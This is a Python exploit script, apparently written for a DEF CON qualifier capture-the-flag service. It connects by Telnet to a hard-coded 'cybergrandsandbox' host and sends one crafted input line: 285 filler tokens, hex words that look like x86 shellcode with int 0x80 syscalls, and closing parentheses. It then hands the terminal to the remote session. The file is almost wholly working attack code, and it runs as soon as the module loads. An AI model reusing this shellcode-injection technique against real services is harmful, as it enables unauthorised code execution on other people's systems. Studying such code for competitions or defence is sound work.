#!/usr/bin/python | |
from Pwning import * | |
# Customs: for when the binary doesn't have NX enabled, or mprotect/mmap is in the GOT table
# from Shellcode import * | |
# Edit this template with your own name
class CGC(Payload):
    """Client for one hard-coded CTF service, built on the Payload base class.

    Payload and Telnet come from the star import of Pwning; neither is
    defined in this file, so their behaviour is not verified here.

    Creating an instance opens the network connection straight away; there
    is no separate connect step and no timeout or error handling.
    """

    def __init__(self):
        Payload.__init__(self)
        # Assumes Payload.__init__ leaves self.host as an indexable container
        # with a slot 1 -- TODO confirm against Pwning.
        self.host[1] = 'cybergrandsandbox_e722a7ec2ad46b9fb8472db37cb95713.quals.shallweplayaga.me'
        self.port = 4347
        # 0 selects the x86 target platform (the author notes 1 for x86_64).
        self.mode = 0
        # Side effect: the connection is made here, at construction time.
        self.conn = Telnet(self.host[1], self.port)

    def pwnTarget(self):
        """Send the single prepared input line, then hand over the session.

        The line is a space-separated token stream: 285 copies of the token
        0x41, a fixed run of 32-bit hex words, and 25 ')' tokens. The counts
        and word values are the author's, tuned to this one service; nothing
        in this file derives them.

        NOTE(review): the hex words look like raw machine code, which would
        only matter where the memory they land in is executable -- not
        confirmed from this file.
        """
        # Wait for the service prompt before sending anything.
        self.conn.read_until('> ')

        filler = '0x41 ' * 285
        words = "0x90909080 0xcd5b016a 0x58026a80 0xcd5a506a 0x5b036a59 0x5358036a 0x41 0x41"
        closers = ') ' * 25

        # One write, newline-terminated, exactly as the original concatenation.
        self.conn.write(''.join((filler, words, closers, '\n')))

        # Attach the local terminal to the remote session.
        self.conn.interact()
# Runs at module load: constructing CGC connects to the hard-coded host, and
# pwnTarget() then sends the prepared line and goes interactive.
cgc = CGC()
cgc.pwnTarget()